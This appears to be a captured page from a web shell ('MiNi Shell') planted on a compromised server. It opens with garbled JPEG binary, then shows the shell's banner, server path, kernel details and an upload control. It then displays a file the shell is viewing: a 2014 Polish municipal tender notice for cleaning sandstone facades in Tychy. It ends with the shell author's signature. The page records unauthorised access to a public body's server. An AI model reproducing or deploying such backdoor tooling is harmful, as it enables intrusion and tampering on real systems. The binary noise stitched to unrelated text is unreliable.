JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140610/195728-N-2014.html

<p class="kh_header"><b>Tychy: CZYSZCZENIE I KONSERWACJA ELEWACJI Z PIASKOWCA BUDYNKU UŻYTECZNOŚCI 
PUBLICZNEJ PRZY UL.BARONA 30 ORAZ NIERUCHOMOŚCI USYTUOWANYCH  PRZY PLACU BACZYŃSKIEGO W TYCHACH</b><br>
<b>Numer ogłoszenia: 195728 - 2014; data zamieszczenia: 10.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CZYSZCZENIE I KONSERWACJA ELEWACJI Z PIASKOWCA BUDYNKU UŻYTECZNOŚCI 
PUBLICZNEJ PRZY UL.BARONA 30 ORAZ NIERUCHOMOŚCI USYTUOWANYCH  PRZY PLACU BACZYŃSKIEGO W TYCHACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót elewacyjnych polegających na wyczyszczeniu oraz konserwacji elewacji z piaskowca budynku przy ul. Barona 30 
     oraz nieruchomości przy Pl. Baczyńskiego w Tychach.     

2.	Zamówienie podzielone jest na 2 części zwane dalej zadaniami:

     ZADANIE Nr 1  - Czyszczenie i konserwacja elewacji z piaskowca budynku użyteczności 
     publicznej Balbina Centrum przy ul. Barona 30
   
     ZADANIE Nr 2  - Czyszczenie i konserwacja elewacji z piaskowca nieruchomości 
     przy Pl. Baczyńskiego:
     1)  ul. Bocheńskiego 12, Batorego 22-28
     2)  ul. Batorego 15 - 27, Biblioteczna 19- 23, Bocheńskiego 6- 8 
     3)  ul. Biblioteczna 24-28
     4)  ul. Bocheńskiego 9-13
     5)  ul. Bocheńskiego 1-7, Budowlanych 38
     6)  ul. Bocheńskiego 2- 4, Budowlanych 32-36

3.	Zakres zamówienia m.in. obejmuje:       
     Mycie elewacji pod ciśnieniem z usunięciem istniejących glonów, zabezpieczenie    
     przeciwgrzybiczne i hydrofobowe 2 razy impregnatem konserwującym i grzybobójczym 
     (pędzlem lub opryskiwaczem).        

4.	Zamawiający dopuszcza zastosowanie materiałów innych - tzw. równoważnych o 
     parametrach i właściwościach nie gorszych niż wskazane przez Zamawiającego 
    w formularzu oferty cenowej stanowiącym integralną część niniejszej SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia 
     z wolnej ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na 
     zasadach określonych w art. 67 ust.1. pkt 6) ustawy - PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8, 45.44.30.00-4, 45.44.23.00-0, 45.45.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym  
 zakresie sposobu oceny spełniania warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania 
       wiedzy i doświadczenia (art. 22 ust. 1 pkt 2 ustawy - PZP), Zamawiający wymaga 
       złożenia następujących dokumentów: 
   1)  wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem 
        terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym           
        okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz                 
        załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te
        zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie 
        z zasadami sztuki budowlanej i prawidłowo ukończone.         
        Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże:             
    
        dla  ZADANIA Nr 1 

        co najmniej jedną robotę budowlaną obejmującą swym zakresem wykonanie konserwacji 
        elewacji z piaskowca  (robota winna dotyczyć realizacji jednego zamówienia i być 
        przedmiotem jednej umowy), o wartości nie mniejszej niż 5 000,00 zł (brutto)



        dla  ZADANIA Nr 2 
   a)  co najmniej jedną robotę budowlaną obejmującą swym zakresem wykonanie konserwacji        
        elewacji z piaskowca  (robota winna dotyczyć realizacji jednego zamówienia i być 
       przedmiotem jednej umowy), o wartości nie mniejszej niż 36 000,00 zł (brutto).

       lub

   b) co najmniej dwie roboty budowlane obejmujące swym zakresem wykonanie konserwacji 
       elewacji z piaskowca (każda z robót  winna dotyczyć realizacji jednego zamówienia i być 
       przedmiotem jednej umowy),  o wartości nie mniejszej niż 18 000 ,00 zł (brutto) - każda z 
       robót.

  

 2)  Do wykazu na wybrane zadanie/ zadania należy dołączyć dowody dotyczące
      najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty 
      oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej 
      i prawidłowo ukończone.

             Dowodami , o których mowa powyżej są:
    a)  poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych 
         lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed 
    upływem terminu składania ofert
    b)  w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych 
         przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać 
         poświadczenia, o którym mowa w pkt 2a)
    c)  w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy - jeżeli 
         z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie 
   uzyskać poświadczenia, o którym mowa w pkt 2a)


         Wykaz wykonanych robót budowlanych należy sporządzić wg wzoru druku stanowiącego 
         załącznik nr 3 do SIWZ.

         (W przypadku podmiotów występujących wspólnie warunek ten wykonawcy mogą 
         spełniać łącznie  lub co najmniej jeden podmiot).       


   1.4.1   W przypadku, gdy zamawiający jest podmiotem , na rzecz którego roboty wskazane w 
        wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania        
         poświadczeń , o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym  
 zakresie sposobu oceny spełniania warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania
      osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP)        
        Zamawiający wymaga aby wykonawca wykazał, że dysponuje, co najmniej jedną osobą 
    posiadającą uprawnienia budowlane w specjalności konstrukcyjno -budowlanej  (do 
    kierowania robotami). 
    Na potwierdzenie niniejszego warunku Zamawiający wymaga złożenia następujących 
    dokumentów:
    1)     Oświadczenie, że osoba/ osoby, które będą uczestniczyć w wykonaniu zamówienia 
   posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich 
          uprawnień. 
           Oświadczenie należy sporządzić wg wzoru druku stanowiącego załącznik nr 4 do SIWZ.
      (W przypadku podmiotów występujących wspólnie warunek ten musi spełniać co najmniej 
      jeden podmiot ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
        wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt  4 ustawy - PZP), 
        Zamawiający wymaga, złożenia następujących dokumentów: 

 
1)	opłaconej polisy, a w przypadku jej braku , innego dokumentu potwierdzającego, że 
  wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
  działalności związanej z przedmiotem zamówienia. 
  Wymagane jest posiadanie ww. dokumentu o wartości ubezpieczenia nie mniejszej niż:
   a)   5 000,00 zł   -   dla ZADANIA Nr 1
         b)  36 000,00 zł   -  dla ZADANIA Nr 2
        Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
        musi wynikać z treści dokumentu.
        Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest
        ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
        związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
        dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
        opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).

                                      (W przypadku podmiotów występujących wspólnie warunek niniejszy warunek udziału            
        podmioty mogą spełniać łącznie lub co najmniej jeden podmiot).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy - sporządzony według wzoru druku stanowiącego załącznik nr 1 do SIWZ;
2)	wypełniony i podpisany formularz ofertowy -  sporządzony według wzoru druku stanowiącego załącznik nr 1a do SIWZ;
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru;
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1)	 zmian personalnych, adresowych, formy prawnej stron umowy;
2)	 zmiany osoby/osób odpowiedzialnych za realizację robót, o których mowa w § 4 umowy;
3)	 zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT;
4)	 zmiany terminu realizacji przedmiotu umowy, w następstwie:
a)	siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego                                 niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy               zachowaniu najwyższej staranności, a które uniemożliwia wykonawcy wykonanie jego zobowiązania w całości lub części;
W razie wystąpienia siły wyższej strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej;
b)	w sytuacji udokumentowanego wystąpienia niesprzyjających warunków atmosferycznych (np.  intensywne opady deszczu) uniemożliwiających wykonywanie robót - zgodnie z technologią i sztuką budowlaną, pod warunkiem terminowego, zgodnego z umową terminu rozpoczęcia robót,   
5)	    zmiany podwykonawcy robót, w trakcie trwania umowy - za zgodą Zamawiającego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2014 godzina 09:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1  - Czyszczenie i konserwacja elewacji z piaskowca budynku użyteczności 
     publicznej Balbina Centrum przy ul. Barona 30.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres zamówienia m.in. obejmuje:       
     Mycie elewacji pod ciśnieniem z usunięciem istniejących glonów, zabezpieczenie    
     przeciwgrzybiczne i hydrofobowe 2 razy impregnatem konserwującym i grzybobójczym 
     (pędzlem lub opryskiwaczem).        

2.	Zamawiający dopuszcza zastosowanie materiałów innych - tzw. równoważnych o 
     parametrach i właściwościach nie gorszych niż wskazane przez Zamawiającego 
    w formularzu oferty cenowej stanowiącym integralną część niniejszej SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8, 45.44.30.00-4, 45.44.23.00-0, 45.45.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2  - Czyszczenie i konserwacja elewacji z piaskowca nieruchomości 
     przy Pl. Baczyńskiego:
     1)  ul. Bocheńskiego 12, Batorego 22-28
     2)  ul. Batorego 15 - 27, Biblioteczna 19- 23, Bocheńskiego 6- 8 
     3)  ul. Biblioteczna 24-28
     4)  ul. Bocheńskiego 9-13
     5)  ul. Bocheńskiego 1-7, Budowlanych 38
     6)  ul. Bocheńskiego 2- 4, Budowlanych 32-36.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres zamówienia m.in. obejmuje:       
     Mycie elewacji pod ciśnieniem z usunięciem istniejących glonów, zabezpieczenie    
     przeciwgrzybiczne i hydrofobowe 2 razy impregnatem konserwującym i grzybobójczym 
     (pędzlem lub opryskiwaczem).        

2.	Zamawiający dopuszcza zastosowanie materiałów innych - tzw. równoważnych o 
     parametrach i właściwościach nie gorszych niż wskazane przez Zamawiającego 
    w formularzu oferty cenowej stanowiącym integralną część niniejszej SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8, 45.44.30.00-4, 45.44.23.00-0, 45.45.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com